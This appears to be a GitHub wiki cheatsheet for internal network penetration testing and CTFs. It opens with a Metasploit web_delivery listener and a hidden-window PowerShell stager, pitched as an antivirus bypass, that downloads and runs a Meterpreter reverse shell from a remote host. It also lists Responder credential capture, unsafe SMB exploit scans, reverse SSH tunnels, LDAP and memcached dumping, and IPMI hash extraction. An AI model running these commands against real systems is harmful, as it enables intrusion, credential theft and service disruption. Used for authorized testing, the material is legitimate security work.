Network - adeptex/CTF GitHub Wiki

Internal Network Pentest Cheatsheet

Powershell Meterpreter Reverse shell (Antivirus Bypass)

# msfconsole listener that serves the one-line stager below and catches the callback
use exploit/multi/script/web_delivery
# stager is served over HTTPS at https://192.168.0.1:8443/ps
set SRVHOST 192.168.0.1
set SRVPORT 8443
set SSL true
# target 2 is web_delivery's PowerShell (PSH) target, matching the stager below
set target 2
set URIPATH ps
# the staged payload calls back to 192.168.0.1:443 over HTTPS
set PAYLOAD windows/x64/meterpreter/reverse_https
set LHOST 192.168.0.1
set LPORT 443
# -j keeps the handler running as a background job
run -j

# Stager for the listener above: runs without a profile in a hidden window, fetches
# https://192.168.0.1:8443/ps through the system proxy using the current user's
# default credentials and hands it to IEX; the ServerCertificateValidationCallback
# assignment makes this process accept any server certificate.
powershell.exe -nop -w hidden -c [System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$g=new-object net.webclient;$g.proxy=[Net.WebRequest]::GetSystemWebProxy();$g.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $g.downloadstring('https://192.168.0.1:8443/ps');

Network Mask

# whatmask breaks a CIDR down into mask / network / broadcast / usable range
apt install whatmask
cidr=10.0.0.22/25
whatmask "$cidr"
import ipaddress

# strict=False lets a host address (192.168.0.22) stand in for its /28 network
net = ipaddress.ip_network("192.168.0.22/28", strict=False)
print(list(net.hosts()))

Traffic

# Monitor: print packet payloads as ASCII on eth0, leaving out port 22 traffic
tcpdump -A -i eth0 not port 22  # HTTP
# same capture, hex dump alongside the ASCII
tcpdump -AX -i eth0 not port 22

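# Find PID from listening network port.
# -l is required: plain -t lists only established sockets, not listeners.
# The ss filter matches the source port exactly; grepping for a bare number
# would also hit PIDs, inodes and unrelated ports (e.g. 2222 for 22).
# -p shows other users' processes only when run as root.
ss -ltnpe "( sport = :${PORT:?set PORT to the port number} )"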

# Known services on port
https://www.speedguide.net/port.php?port=$PORT

Tunnels

## Reverse SSH Tunnel
# Detached (-f) forwarding-only (-N) session: port 2222 on vps is mapped back
# to this host's 127.0.0.1:22; nohup keeps it alive after the terminal closes.
nohup ssh -p 22 -f -N -R 2222:127.0.0.1:22 user@vps

# Expose Remote Service: vps:2223 is forwarded to local 8834, then socat
# (presumably run on the vps) accepts on 2224 from any interface and relays
# to that loopback-bound forward, dropping to "nobody" for each forked client.
ssh -p 22 -f -N -R 2223:127.0.0.1:8834 user@vps
socat \
  TCP-LISTEN:2224,su=nobody,fork,reuseaddr \
  TCP-CONNECT:127.0.0.1:2223

Services

# msfconsole db_nmap (results land in the workspace database). Full TCP range with
# version/default-script/OS detection; -Pn/-n skip host discovery and DNS, --open
# keeps only open ports, --max-hostgroup 4 limits parallel hosts. -O needs root.
db_nmap -T4 -p- -sV -sC -O -v -n -Pn --open --max-hostgroup 4 -oX nmap.tcp.xml -iL hosts.txt
# UDP 1-1000 with the same options; -sU together with -sV is slow, hence the small port range
db_nmap -T4 -p1-1000 -sU -sV -sC -v -n -Pn --open --max-hostgroup 4 -oX nmap.udp.xml -iL hosts.txt

Text-based web

apt install w3m
# Follow redirects and render the page as text; --insecure (-k) skips
# certificate verification, so drop it where the chain should be validated.
curl --location --insecure https://url | w3m -dump -T text/html

Spider

# Release archive is fetched without an integrity check; compare it against the
# checksum published on the release page before extracting.
crawley_ver=1.7.10
wget "https://github.com/s0rg/crawley/releases/download/v${crawley_ver}/crawley_v${crawley_ver}_linux_x86_64.tar.gz" \
  && tar xvf "crawley_v${crawley_ver}_linux_x86_64.tar.gz" crawley
# unlimited depth, TLS errors ignored, headless browser, all link sources; sitemap kept in sitemap.txt
./crawley -depth -1 -skip-ssl -headless -all https://url | tee sitemap.txt

Dirs

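pip3 install dirsearch
# low and slow: 3 threads, 30 req/s cap, 3 s timeout; 404 responses are excluded
dirsearch --no-color --random-agent --full-url -x 404 --timeout 3 --threads 3 --max-rate 30 -u https://url
# Collect every URL from the report files and drop comment / 404 lines.
# find -exec … + passes file names as arguments, so names with spaces do not
# break as they would with `find | xargs cat`.
find reports -iname '*.txt' -exec cat -- {} + \
  | grep -E 'https?://' \
  | grep -Ev '^(#|404) ' > dirs.txt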

Nuclei

# https://github.com/projectdiscovery/nuclei/releases
# Archives are fetched without an integrity check; verify them against the
# checksums on the release page before unpacking.
nuclei_ver=3.3.4
wget "https://github.com/projectdiscovery/nuclei/releases/download/v${nuclei_ver}/nuclei_${nuclei_ver}_linux_amd64.zip" \
  && unzip "nuclei_${nuclei_ver}_linux_amd64.zip"
# https://github.com/projectdiscovery/nuclei-templates/releases
# NOTE(review): a tag archive unpacks to nuclei-templates-<ver>/, while the run
# below points -t at templates/…; presumably a rename or symlink is expected — confirm.
templates_ver=10.0.1
wget "https://github.com/projectdiscovery/nuclei-templates/archive/refs/tags/v${templates_ver}.tar.gz" \
  && tar xvf "v${templates_ver}.tar.gz"

# Technology-detection templates only, throttled (-rl 20, -c 4, no retries),
# no update check (-duc), no interactsh (-ni); outputs and cached responses go under ./nuc
./nuclei -duc -ni -v -timeout 3 -rl 20 -c 4 -retries 0 \
  -follow-redirects -max-redirects 5 \
  -project-path ./nuc -je ./nuc.json -o ./nuc.txt -store-resp-dir ./nuc/cache \
  -t templates/http/technologies -l urls.txt

CVEs

# https://github.com/projectdiscovery/cvemap/releases/
# Archive is fetched without an integrity check; verify against the release checksum.
cvemap_ver=0.0.7
wget "https://github.com/projectdiscovery/cvemap/releases/download/v${cvemap_ver}/cvemap_${cvemap_ver}_linux_amd64.zip" \
  && unzip "cvemap_${cvemap_ver}_linux_amd64.zip"

# Get apikey at https://cloud.projectdiscovery.io
# -auth presumably prompts for the key, keeping it out of argv and shell history
./cvemap -auth
# -duc skips the update check; -q is a free-text query
./cvemap -duc -q weblogic


# CVE details
https://www.cvedetails.com/cve/CVE-2024-xxxxx

Transport Layer Security (TLS)

# SSL/TLS Versions only: the per-cipher and extension checks are all switched off,
# results go to sslscan.xml, targets are read one per line from sslscan.targets.txt
sslscan --no-ciphersuites --no-fallback --no-renegotiation --no-compression \
  --no-heartbleed --no-cipher-details --no-groups --no-sigs --bugs --verbose \
  --xml=sslscan.xml --targets=sslscan.targets.txt

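# TLS cert signed for domains: list the subjectAltName DNS entries of the leaf cert.
# -servername sends SNI explicitly (older OpenSSL does not derive it from -connect);
# grep -o 'DNS:[^,]+' yields one entry per line on any platform (the previous
# sed 's/, /\n/g' relied on GNU sed) and no longer sweeps other SAN types
# such as "IP Address:" into the output.
target="domain.com:443"
echo \
  | openssl s_client -showcerts -servername "${target%%:*}" -connect "$target" 2>/dev/null \
  | openssl x509 -inform pem -noout -text \
  | grep -Eo 'DNS:[^,]+' \
  | sed 's/^DNS://'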

Sn1per

git clone https://github.com/1N3/Sn1per
Sn1per/install.sh
# same workspace and host list, two modes run back to back
for mode in airstrike nuke; do
  sniper -w workspace -f /root/hosts.txt -m "$mode"
done

EyeWitness

apt install eyewitness
# keep only the screenshots: move them up, then discard the rest of the output dir
eyewitness --web -d ewout -f urls.txt \
  && mv ewout/screens . \
  && rm -rf -- ewout
git clone https://github.com/ChrisTruncer/EyeWitness
EyeWitness/EyeWitness.py --active-scan --prepend-https --web -f http_hosts.txt

Responder

git clone https://github.com/SpiderLabs/Responder
# bound to eth0; the bundled -wrf written as separate flags
Responder/Responder.py -I eth0 -w -r -f

SMB

# SMB vulnerability checks over port 445 for hosts.txt, two hosts at a time.
# unsafe=1 enables checks that may crash the service (smb-vuln-regsvc-dos is a
# denial-of-service probe by design); -oA writes smb-vulns.{nmap,gnmap,xml}.
smb_scripts=smb-vuln-conficker.nse,smb-vuln-cve2009-3103.nse,smb-vuln-cve-2017-7494.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse,smb-vuln-regsvc-dos.nse
nmap --script="$smb_scripts" --script-args=unsafe=1 \
  -p445 -Pn -n -T4 -v --max-hostgroup=2 \
  -oA smb-vulns -iL hosts.txt

Pass the Hash: https://www.offensive-security.com/metasploit-unleashed/psexec-pass-hash/

LDAP

pip install ldap3 dnspython ldapdomaindump
# dump the directory (users, groups, computers) reachable at the DC into /root/ldap
dc=192.168.0.1
ldapdomaindump -u 'DOMAIN\user' -o /root/ldap "$dc"

Memcached (11211/tcp)

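apt install libmemcached-tools
# List every key, then fetch their values. Keys are collected into an array
# instead of an unquoted backtick substitution, which would word-split and
# glob-expand keys containing whitespace or characters such as '*'.
mapfile -t memc_keys < <(memcdump --servers 192.168.0.1)
memccat --servers 192.168.0.1 "${memc_keys[@]}"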

IPMI

https://www.thomas-krenn.com/en/wiki/Security_Recommendations_for_Remote_Maintenance_Features_for_IPMI_Chips_with_ATEN-Software

  • http://ip-of-ipmi/save_config.bin
  • http://ip-of-ipmi/save_config
  • http://ip-of-ipmi/images/Snapshot.bmp

Get users and their password hashes with scanner/ipmi/ipmi_dumphashes